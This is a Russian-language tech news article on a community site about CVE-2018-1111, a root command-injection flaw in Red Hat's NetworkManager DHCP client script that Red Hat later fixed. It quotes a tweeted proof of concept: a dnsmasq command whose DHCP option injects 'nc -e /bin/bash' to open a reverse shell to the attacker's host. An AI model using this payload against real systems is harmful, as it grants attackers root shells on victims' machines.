Авторизация:


Сообщество людей и технологий
Сегодня у нас: год

Уже есть аккаунт? Войти
Присоединяйся к нашему гик сообществу!

Создай свой блог, делись интересной информацией из мира высоких технологий.

Разработчики Red Hat устранили опасный баг в DHCP-клиенте
Статьи, 10-02-2018, 03:40

Разработчики Red Hat устранили опасный баг в DHCP-клиенте

Инженер Google Security Team Феликс Вильгельм (Felix Wilhelm) обнаружил критическую уязвимость в DHCP-клиенте, который используется в Red Hat Linux и его производных, к примеру, Fedora. Баг получил идентификатор CVE-2018-1111 и может использоваться для выполнения произвольных команд в уязвимой системе с root-привилегиями.

Уязвимость была связана с работой скрипта интеграции NetworkManager. Вильгельм пишет, что проблема позволяла атакующему с вредоносным DHCP-сервером или подключенному к той же сети, что и жертва, подделать ответы DHCP, что в итоге заставит систему с уязвимым NetworkManager и DHCP-клиентом выполнить произвольные команды злоумышленника.

Хотя все технически детали проблемы пока не были обнародованы, эксперт заявил, что PoC-эксплоит для уязвимости настолько мал, что умещается в одно сообщение в Twitter. Вскоре после этого ИБ-специалист из Турции доказал правоту Вильгельма, опубликовав эксплоит в своем микроблоге.

#CVE-2018-1111 tweetable PoC ???? dnsmasq —interface=eth0 —bind-interfaces —except-interface=lo —dhcp-range=10.1.1.1,10.1.1.10,1h —conf-file=/dev/null —dhcp-option=6,10.1.1.1 —dhcp-option=3,10.1.1.1 —dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" cc: @cnbrkbolat pic.twitter.com/vUICm2HluC

— Bark?n K?l?? (@Barknkilic) May 15, 2018

Специалисты Red Hat подтвердили серьезность проблемы, выпустили исправления и сообщили, что она затрагивает Red Hat Enterprise Linux 6 и 7, также подтверждена уязвимость Fedora. Другие дистрибутивы, такие как OpenSUSE и Ubuntu, проблема не затронула, так как они не используют скрипт интеграции NetworkManager.


Добавьте комментарий, Ваше мнение очень важно:

Имя:*
E-Mail:
Комментарий:
Вопрос:
rgjrg
Ответ:*
Введите код: *


Самое интересное:
    Гику на заметку:
    Не iPhone самый продаваемый телефон в истории
    Новый планшет BlackBerry PlayBook
    Особенности ремонта айфонов своими руками
    Переделка дачи
    Как выбрать недорогой смартфон
    Зависимость от... мобильного телефона и телевизора
    Востребованные чехлы для ipone 4
    Apple. Истинный лидер или дань моде?
    Чехлы для смартфонов и айфонов
    Вопрос:

    Сколько времени в день Вы проводите за компьютером?

    Более 1 часа
    Более 3 часов
    Более 6 часов
    Более 9 часов
    Более 12 часов

     


    2019 © Cig-bc.ru - Сообщество людей и технологий.

    Все права защищены.

    При цитировании любых материалов, публикуемых в журнале, обязательна ссылка, помещенная не ниже первого абзаца текста. При копировании новостных материалов для интернет-изданий обязательна прямая открытая для поисковых систем гиперссылка, размещаемая вне зависимости от объема используемых материалов (полного или частичного). Рекламная статья со ссылкой на ваш ресурс/продукт — 500 рублей/1000 символов (статья будет висеть вечно, в качестве обзорной). Для заказа пишите на sales@elenazavyalova.ru!

    Категории:

    Новости IT
    Гаджеты
    Железо
    Софт
    Игры
    Информация:

    О проекте
    Регистрация
    Статистика
    Карта сайта
    RSS
    Контакт:

    Обратная связь
    Email: admin@cig-bc.ru
    Email: sotnik200854@gmail.com